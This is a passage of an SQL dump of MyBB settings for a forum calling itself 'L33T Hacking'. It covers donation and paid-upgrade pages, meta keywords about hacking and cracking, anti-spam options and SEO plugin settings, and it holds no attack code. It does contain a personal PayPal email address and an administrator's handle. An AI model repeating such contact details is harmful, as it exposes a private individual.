('255', 'dp_guests', 'Guest Access', 'Should guests be allowed to donate?', 'yesno', '0', '2', '29', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('256', 'dp_currency', 'Currency', 'What is the currency you wish to be paid in?', 'select USD= US Dollars AUD= Australian Dollars GBP= British Pound CAD= Canadian Dollars JPY= Japanese Yen DKK= Danish Krone HKD= Hong Kong Dollar JPY= Japanese Yen CHF= Swiss Franc PLN= Polish Zloty SGD= Singapore Dollar EUR= Euro', 'USD', '3', '29', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('257', 'dp_email', 'PayPal Email', 'What is your PayPal email address?', 'text', 'kamihafeez@hotmail.com', '4', '29', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('258', 'dp_message', 'Donation Page Message', 'What would you like it to say on the donation page? (HTML Permitted)', 'textarea', '<strong style=\"color: green;\"><u>Elite Membership Upgrade Page</u></strong> <Br /> <br /> <b>Benefits of being an Elite</b> <li>Access all forums</li> <li>Change Username</li> <li>PM space of 1000</li> <li>Delete own posts anytime</li> <li>Track messages</li> <li>Less waiting time during posting of new threads and replies <li>Ability to give reputation to others</li> <li>Can keep signatures</li> <li>Can use custom usertitles</li> <li>Can upload attachments</li> <li>Can post and vote polls</li> <li>Eternal support and happiness</li> <li>Special Elite support userbar</li> <br /> <img src=\"images/ub/elite1.png\"> <br /> <span style=\"color: green;\">All upgrades are lifetime, we reserve the right to ban, demote or suspend your account anytime without any refunds. By upgrading you agree to not expose, reveal or redistribute VIP contents with others. Any abuse with upgrade privileges will result in a ban or suspension. If you are buying an upgrade for someone else, then PM the transaction ID to t3h jok3r and enter the link of the user who the upgrade is for. All upgrades are on your discretion and all upgrades are lifetime. We do not offer any coupons, but we surely do offer promotions/sales when we feel is the right moment. You also agree that you are responsible for what you do with our websites content. LH is educational site and for legal purposes.</span> <br /> <br /> <span style=\"color: red;\">1. After buying an upgrade, PM your transaction ID to <a href= http://l33thacking.com/member.php?action=profile&uid=1><strong><span style=\"color: red;\"><i><u>t3h jok3r</u></i></span></strong></a>. <br/> 2. All upgrades can take up to <strong>48 hours</strong>. <br /> 3. We are/do <strong>NOT</strong> force the decision of purchasing an upgrade on you, it\'s your choice. <br /> 4. We do <strong>NOT</strong> offer refunds on upgrades. <br /> 5. You agree to all our terms of service stated above.<br /> </span>', '5', '29', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('259', 'dp_value', 'Recommended Donation Amount', 'The amount of money you recommend users to donate (Will appear in textbox by default, do not include currency symbols!)', 'text', '5.00', '6', '29', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('260', 'dp_minimum', 'Minimum Donation Amount', 'This is the minimum amount of money required to donate - Recommended: 1, Disable: 0. (Decimal numbers are allowed, do not include currency symbols!)', 'text', '1.00', '7', '29', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('261', 'dp_credits', 'Keep MyBBWebHost Credit Line?', 'While we greatly appreciate it if you leave the credits line at the bottom of the Donation Page, it is not required.', 'yesno', '0', '8', '29', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('358', 'easyrefer_show', 'Show Referrals', 'Should members be able to view other member referrals?', 'yesno', '1', '13', '9', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('317', 'metakeywords', 'Meta Keywords', 'Enter the keywords to be placed for your site. These are sitewide.', 'text', 'monetizing, programs, virus, whitehat, graphics, webmaster, coding, java, exploits, hacking, cracking, web, forum, wifi, facebook, email, porn, social engineering, accounts, ', '20', '7', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('318', 'metadescr', 'Meta Description', 'Create a description. This gets displayed on index page.', 'textarea', 'L33T Hacking is a educational hacker community with various discussions on computing.', '21', '7', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('357', 'goodbyespammerapikey', 'Stop Forum Spam API Key', 'In order to be able to submit information on a spammer to the Stop Forum Spam database, you need an API key. You can get one of these <a href=\"http://stopforumspam.com/signup\" target=\"_blank\">here</a>. When you have your key, paste it into the box below.', 'text', '', '5', '44', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('356', 'goodbyespammerbangroup', 'Ban Usergroup', 'Enter the ID of the usergroup (not the name) to put users into when they get banned. Defaults to 7, the default Banned usergroup. The above setting must be set to \'Ban\' for this to take effect.', 'text', '7', '4', '44', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('355', 'goodbyespammerbandelete', 'Ban or Delete Spammers', 'Do you want to ban or delete spammers with this tool?? It will still be optional on the Goodbye Spammer page.', 'radio ban=Ban (Permanent) delete=Delete', 'ban', '3', '44', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('353', 'goodbyespammergroups', 'Allowed Usergroups', 'Enter the ID of the usergroups who are allowed to use Goodbye Spammer.', 'text', '3,4,6', '1', '44', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('354', 'goodbyespammerpostlimit', 'Post Limit', 'This setting stops this tool being used on users who have more than a certain amount of posts, to prevent it being used on active members. Setting the value to 0 will disable the post check, however this is not recommended.', 'text', '10', '2', '44', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('302', 'ForumsRequirements_title', 'Titulo de Error', 'Ingresa el titulo a mostrar en el error', 'text', 'Access Denied!', '1', '35', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('303', 'ForumsRequirements_body', 'Mensaje de Error', 'Ingresa el mensaje a mostrar en el error', 'textarea', 'You are required to have 5 posts in order to access this forum. ', '2', '35', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('304', 'ForumsRequirements_archive', 'Mensaje de Error en el Archivo', 'Ingresa el mensaje a mostrar en el error si intentan ver en el archivo el foro', 'textarea', 'You are required to have 5 posts in order to access this forum. ', '3', '35', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('305', 'strictUsernameMode', 'Working mode', 'Depending on this setting, the plugin may reject / allow use of under certain chars.', 'select reject=Reject allow=Allow ', 'allow', '1', '36', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('306', 'strictUsernameStatusCharsSmall', 'Lowercase', 'Allow/reject: q, w, e, r, t, y, u, i, o, p, a, s, d, f, g, h, j, k, l, z, x, c, v, b, n, m', 'onoff', '1', '2', '36', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('307', 'strictUsernameStatusCharsBig', 'Uppercase', 'Allow/reject: Q, W, E, R, T, Y, U, I, O, P, A, S, D, F, G, H, J, K, L, Z, X, C, V, B, N, M', 'onoff', '1', '3', '36', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('308', 'strictUsernameStatusNumeric', 'Numbers', 'Allow/reject: 0, 1, 2, 3, 4, 5, 6, 7, 8, 9', 'onoff', '1', '4', '36', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('309', 'strictUsernameStatusSpaces', 'Spaces', 'It causes that spaces will be allowed/rejected.', 'onoff', '0', '5', '36', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('310', 'strictUsernameStatusPunctuation', 'Punctuation', 'Allow/reject: ., ,, :, ;, !, ?, -, _, [, ], (, ), {, }', 'onoff', '0', '6', '36', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('311', 'strictUsernameStatusSpecials', 'Special chars', 'Allow/reject: @, |, #, $, %, ^, *, +, =, /, \\', 'onoff', '0', '7', '36', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('312', 'strictUsernameStatusAdditional', 'Additional chars', 'Extra characters to allow/reject, for example national characters. They must be separated by a comma.', 'text', '$,/,\\', '8', '36', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('313', 'myflood_posts_onoff', 'MyFlood Post Flood On/Off', 'Turns the MyFlood post flood protection on and off for all usergroups', 'yesno', '1', '1', '37', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('314', 'myflood_threads_onoff', 'MyFlood Thread Flood On/Off', 'Turns the MyFlood thread flood protection on and off for all usergroups', 'yesno', '1', '2', '37', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('315', 'myflood_ptflood', 'MyFlood post flood includes new threads?', 'If this is set to yes then the post flood protection will count new threads as posts. For this to work the option above must be enabled.', 'yesno', '1', '3', '37', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('325', 'moderation_posts_power', 'Power', 'Select Yes if you really wants this plugin to run.', 'yesno', '1', '1', '39', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('326', 'moderation_posts_group', 'Allowed_Groups', 'Specify usergroups who can see this. Separate with , if more then one.', 'text', '3,4', '2', '39', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('359', 'google_seo_404', 'Enable Google SEO 404', 'This module replaces the <i>HTTP 200 OK</i> response with <i>HTTP 404 Not Found</i> for invalid thread / forum / etc error pages and provides additional functionality for 404 error pages. You can also do custom 404 error pages by adding an ErrorPage directive to your .htaccess. Please see the <a href=\"../inc/plugins/google_seo.html\">documentation</a> for details.<br /><br />Set to YES to enable Google SEO 404. Setting this to NO also disables all other settings in the Google SEO 404 settings group.', 'yesno', '1', '1', '45', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('360', 'google_seo_meta', 'Enable Google SEO Meta', 'This module generates meta tags for the current page. Please see the <a href=\"../inc/plugins/google_seo.html\">documentation</a> for details.<br /><br />Set to YES to enable Google SEO Meta. Setting this to NO also disables all other settings in the Google SEO Meta settings group.', 'yesno', '1', '2', '45', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('361', 'google_seo_redirect', 'Enable Google SEO Redirect', 'This module redirects old and invalid URLs to their current proper names. This can be used for all sorts of redirections: redirect to the main site if your forum is available under several domain names, redirect stock MyBB URLs to Google SEO URLs (or the other way around). This prevents your users and Google from seeing the same page under several different names. Please see the <a href=\"../inc/plugins/google_seo.html\">documentation</a> for details.<br /><br />Set to YES to enable Google SEO Redirect. Setting this to NO also disables all other settings in the Google SEO Redirect settings group.', 'yesno', '0', '3', '45', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('362', 'google_seo_sitemap', 'Enable Google SEO Sitemap', 'This module provides <a href=\"http://sitemaps.org/\">XML Sitemap</a> for your forum. This makes it easier for Google to discover pages on your site. Please see the <a href=\"../inc/plugins/google_seo.html\">documentation</a> for details.<br /><br />Set to YES to enable Google SEO Sitemap. Setting this to NO also disables all other settings in the Google SEO Sitemap settings group.', 'yesno', '1', '4', '45', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('363', 'google_seo_url', 'Enable Google SEO URL', 'This module replaces the stock MyBB URLs with descriptive URLs that use words (thread subject, forum title, user name, etc) instead of random numeric IDs. Please see the <a href=\"../inc/plugins/google_seo.html\">documentation</a> for details.<br /><br />Set to YES to enable Google SEO URL. Setting this to NO also disables all other settings in the Google SEO URL settings group.', 'yesno', '0', '5', '45', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('364', 'google_seo_404_widget', '404 widget', 'Add the Google 404 widget for 404/403 error pages.', 'yesno', '1', '1', '46', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('365', 'google_seo_404_wol_show', 'Show 404 errors in Who\'s Online', 'Specify if you want to show that users are seeing the 404 error page in the Who\'s Online list. This is not recommended. Enabling this can cause problems such as spambots showing up as guests, or users showing up as seeing error pages if your forum e.g. tries to include an image that does not exist.', 'radio 0=No 1=Yes 2=Yes, including URI', '0', '2', '46', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('366', 'google_seo_404_status', 'Customize HTTP status codes', 'Specify which <a href=\"http://en.wikipedia.org/wiki/List_of_HTTP_status_codes\" target=\"_blank\">HTTP status code</a> should be returned for specific error pages. You can specify one status code per line followed by = and a comma-separated list of error labels, which may include wildcards. By default, the returned status code is 404 Not Found.', 'php <textarea name=\\\"upsetting[{$setting[\'name\']}]\\\" rows=\\\"5\\\" cols=\\\"80\\\" wrap=\\\"off\\\">\".htmlspecialchars($setting[\'value\']).\"</textarea>', '404 Not Found=* 403 Forbidden=no_permission 503 Service Unavailable=boardclosed 200 OK=nosearchresults,redirect_*', '3', '46', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('367', 'google_seo_404_debug', 'Debug 404 error labels', 'Setting this to Yes will show an error label on error pages. The labels can then be used to configure custom error codes for that page.', 'yesno', '0', '4', '46', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('368', 'google_seo_meta_length', 'Meta description', 'Generate Meta description tags based on the contents of the current page (description of a forum, first posting of a thread, ...). Set to the maximum description length you want to allow or to 0 to disable.', 'text', '200', '1', '47', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('369', 'google_seo_meta_canonical', 'Canonical Page', 'Specify a canonical page. This helps avoid Google indexing the same page under several different names. Please see <a href=\"http://www.google.com/support/webmasters/bin/answer.py?hl=en&amp;answer=139394\">About rel=\"canonical\"</a> for details.', 'yesno', '1', '2', '47', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('370', 'google_seo_meta_archive', 'Meta for Archive Mode', 'Enable this option if you want tags to be added to MyBB\'s Lite (Archive) Mode pages. If this setting is disabled, Google SEO Meta will ignore the Archive mode altogether.', 'yesno', '1', '3', '47', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('371', 'google_seo_meta_page', 'Provide page number for forum and thread titles', 'If set, initialize a variable for forum and thread pages &gt; 1. {page} stands for Page (translatable in googleseo.lang.php), {number} for the actual page number. Edit your <i>forumdisplay</i> and <i>showthread</i> templates to include <i>{$google_seo_page}</i> in the &lt;title&gt; tag.', 'text', ' - {page} {number}', '4', '47', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('372', 'google_seo_meta_nofollow', 'Nofollow links', 'Give recently posted links the <a href=\"http://en.wikipedia.org/wiki/Nofollow\" target=\"_blank\">Nofollow</a> attribute. If your forum gets spammed, this will give you time to moderate, while still giving reputation to outgoing links in the long run. The default value is 7.0 days (one week). Set to 0 to disable, or -1 for infinite duration (not recommended).', 'text', '7.0', '5', '47', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('373', 'google_seo_meta_noindex_fids', 'Noindex forums', 'If you want to prevent one or more forums and its threads from being indexed by search engines altogether, enter a comma separated list of forum IDs here. This is not recommended but might be useful for trashcan or duplicate content forums.', 'text', 'http://l33thacking.net/forum-46.html', '6', '47', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('374', 'google_seo_redirect_permission', 'Permission Checks', 'Should Redirect let permission checks run first? Enabling this option will prevent Redirect from redirecting URLs for items that the user is not allowed to access anyway. This is probably only necessary if you\'re also using SEO URLs and you\'re concerned about users getting redirected to the SEO URL of a forum / thread they\'re not allowed to read, which would give away the subject in the SEO URL.', 'yesno', '0', '1', '48', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('375', 'google_seo_redirect_posts', 'Redirect Post Links', 'MyBB allows linking to specific posts by specifying the post ID (pid) in the URL. Redirect can trust the thread ID (tid) it tid was given and query it if it was not (default MyBB behaviour), or it can verify the tid (by making a query) in order to redirect links to posts that were moved to another thread, or it can ignore these links completely (avoiding the tid query altogether).', 'radio default=Default (query on demand) verify=Verify (always query) ignore=Ignore (never query)', 'default', '2', '48', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('376', 'google_seo_redirect_litespeed', 'LiteSpeed Bug workaround', 'If your server is running LiteSpeed &lt;= 4.0.10 instead of Apache, and you see redirection loops on member profile / send mail or calendar event / edit event pages, you are suffering from a bug in LiteSpeed\'s mod_rewrite replacement. Set to YES to work around this bug - Google SEO Redirect will then leave the problematic pages alone. Apache / Nginx / lighttpd users can leave this at NO.', 'yesno', '0', '3', '48', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('377', 'google_seo_redirect_debug', 'Debug Redirect', 'If you experience infinite redirection loops due to Google SEO Redirect, please enable this option to obtain more information about what is going wrong with your redirect and then report a bug to the plugin author. The debug information is ugly and therefore shown only to board admins.', 'yesno', '0', '4', '48', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('378', 'google_seo_sitemap_url', 'Sitemap URL scheme', 'This is the URL scheme used for the XML Sitemap pages. By default, this is <i>sitemap-{url}.xml</i> and your sitemap will be called <i>sitemap-index.xml</i>. Please note that if you change this, you will also need to add a new rewrite rule to your .htaccess. If your host does not support mod_rewrite, leave this empty. Your sitemap will then be called <i>misc.php?google_seo_sitemap=index</i>.', 'text', 'sitemap-{url}.xml', '1', '49', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('379', 'google_seo_sitemap_forums', 'Forums', 'Include Forums in the XML Sitemap.', 'radio 0=No 1=Yes 2=Yes, including forum pages', '1', '2', '49', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('380', 'google_seo_sitemap_threads', 'Threads', 'Include Threads in the XML Sitemap.', 'radio 0=No 1=Yes 2=Yes, including thread pages', '1', '3', '49', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('381', 'google_seo_sitemap_users', 'Users', 'Include Users in the XML Sitemap.', 'yesno', '1', '4', '49', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('382', 'google_seo_sitemap_announcements', 'Announcements', 'Include Announcements in the XML Sitemap.', 'yesno', '1', '5', '49', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('383', 'google_seo_sitemap_calendars', 'Calendars', 'Include Calendars in the XML Sitemap.', 'yesno', '0', '6', '49', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('384', 'google_seo_sitemap_events', 'Events', 'Include Events in the XML Sitemap.', 'yesno', '0', '7', '49', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('385', 'google_seo_sitemap_additional', 'Additional Pages', 'List of additional URLs relative to your site that should be included in the XML Sitemap. If you have any custom pages you can include them here, one page per line. Entries must be relative to your site, i.e. they must not contain http://, and must not start with .. or /.', 'textarea', 'index.php ', '8', '49', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('386', 'google_seo_sitemap_pagination', 'Sitemap Pagination', 'Set the maximum number of items that may appear in a single XML Sitemap before it is split (not counting optional forum/thread pages). Setting it too low will result in too many sitemaps, setting it too high may cause server load every time the sitemap is generated. If unsure, leave at 1000.', 'text', '1000', '9', '49', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('387', 'google_seo_url_query_limit', 'Query Limit', 'Google SEO uses the database to store, and subsequently query, unique SEO URLs for every forum, thread, etc. While these queries are fast and usually low in number, in some cases the total number of queries per request may exceed sane values. Possible causes for this are new installs in large forums when lots of SEO URLs have to be created for the first time, as well as plugins that add lots of unexpected links on a page. Limiting the total number of queries per request helps to avoid load spikes. Stock URLs will appear for the links that couldn\'t be queried due to this limit.<p>Set the total number of queries URL is allowed to use in a single request. Default is 50. Set to 0 for no limit.</p>', 'text', '50', '1', '50', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('388', 'google_seo_url_mode', 'Evaluation Mode', 'In Full Mode (which is the default), Google SEO will query and return SEO URLs directly at the time they are requested. This is the most reliable method but it will probably use more than just one database query, depending on how well Google SEO can predict which links will show up on a page. In Lazy Mode, Google SEO will first collect all links created on a page, and only at the very end obtain all SEO URLs in a single query and replace their stock URL counterparts in the output. This reduces queries to a minimum, at the cost of PHP processing time and reliability.', 'radio 0=Full Mode (Default) lazy=Lazy Mode', '0', '2', '50', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('389', 'google_seo_url_cache', 'Use MyBB\'s Cache system for SEO URLs', 'If set, the cache will be populated with the URLs used on the specified pages (by default, index.php and portal.php). Under ideal conditions this will reduce the need for additional queries as the required URLs will already be available from the cache. If the setting starts with a number, the cache will be flushed every x minutes (otherwise it defaults to 15 minutes). Set to empty to disable.<p>Warning: Do not include pages which contain unlimited/all URLs like forumdisplay/showthread. They would make the cache grow too large to be useful.</p>', 'text', '15,index.php,', '3', '50', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('390', 'google_seo_url_punctuation', 'Punctuation characters', 'Punctuation and other special characters are filtered from the URL string and replaced by the separator. By default, this string contains all special ASCII characters including space. If you are running an international forum with non-ASCII script, you might want to add unwanted punctuation characters of those scripts here.', 'text', '!\"#$%&\'( )*+,-./:;<=>?@[\\]^_`{|}~', '4', '50', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('391', 'google_seo_url_separator', 'URL separator', 'Enter the separator that should be used to separate words in the URLs. By default this is - which is a good choice as it is easy to type in most keyboard layouts (single keypress without shift/alt modifier). If you want some other character or string as a separator, you can enter it here. Please note that special characters like :&amp;?@/ or space could render your URLs unuseable or hard to work with.', 'text', '-', '5', '50', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('392', 'google_seo_url_uniquifier', 'URL uniquifier', 'In case of URL collisions (for example two threads with the same title), the uniquifier is applied to the URL of the newer thread. To guarantee uniqueness, the uniquifier must incorporate the ID and use punctuation other than a single separator. Please see the <a href=\"../inc/plugins/google_seo.html\">documentation</a> for examples of good and bad uniquifiers.', 'text', '{url}{separator}{separator}{id}', '6', '50', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('393', 'google_seo_url_uniquifier_force', 'URL uniquifier enforcer', 'This option is NOT recommended. If you set this to yes, Google SEO will be forced to use the uniquifier for all URLs without exception, even if it\'s not necessary. Use this only if you absolutely want every URL to contain the ID. If you enable this, a single separator will be sufficient for the uniquifier.', 'yesno', '0', '7', '50', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('394', 'google_seo_url_translation', 'Character Translation', 'If you want to replace some characters (German umlaut example: Übergrößenträger -&gt; Uebergroessentraeger) or words in your URLs, please add your translations here. You can specify one character per line followed by = and the replacement character. Please see the <a href=\"../inc/plugins/google_seo.html\">documentation</a> for details.', 'php <textarea name=\\\"upsetting[{$setting[\'name\']}]\\\" rows=\\\"5\\\" cols=\\\"80\\\" wrap=\\\"off\\\">\".htmlspecialchars($setting[\'value\']).\"</textarea>', '', '8', '50', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('395', 'google_seo_url_lowercase', 'lowercase words', 'If you prefer lower case URLs, you can set this to YES. This will not affect the way URLs are stored in the database so you can go back to the original case letters any time. Please note that if you set this to YES, you will also have to make sure that your forum URL, as well as scheme and uniqufier are all lowercase too for the URL to be completely in lower case.', 'yesno', '0', '9', '50', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('396', 'google_seo_url_length_soft', 'URL length soft limit', 'URLs can be shortened after a soft limit by truncating it after a word (punctuation separator). Set to 0 to disable.', 'text', '0', '10', '50', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('397', 'google_seo_url_length_hard', 'URL length hard limit', 'URLs can be shortened after a hard limit by truncating it regardless of word separators. Set to 0 to disable.', 'text', '0', '11', '50', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('398', 'google_seo_url_posts', 'Handle Post Links', 'MyBB allows linking to specific posts by specifying the post ID (pid) in the URL. URL can trust the thread ID (tid) it tid was given and query it if it was not (default), or it can verify the tid (by making a query) in order to show correct links to posts at all times, or it can ignore these links completely (avoiding the tid query altogether by showing a stock post URL).', 'radio default=Default (query on demand) verify=Verify (always query) ignore=Ignore (never query)', 'default', '12', '50', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('399', 'google_seo_url_multipage', 'Handle multipage links', 'MyBB uses a special multipage() function to produce pagination links for all sorts of things, including forum and thread pages. Set this to Yes to allow Google SEO to attempt replacing these with their SEO URL counterparts, otherwise no.', 'yesno', '0', '13', '50', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('400', 'google_seo_url_forums', 'Forum URL scheme', 'Enter the Forum URL scheme. By default this is <i>Forum-{url}</i>. Please note that if you change this, you will also need to add a new rewrite rule in your .htaccess file. Leave empty to disable Google SEO URLs for Forums.', 'text', 'forum-{url}', '14', '50', '0'); INSERT INTO `mybb_settings` (`sid`, `name`, `title`, `description`, `optionscode`, `value`, `disporder`, `gid`, `isdefault`) VALUES ('401', 'google_seo_url_threads', 'Thread URL scheme', 'Enter the 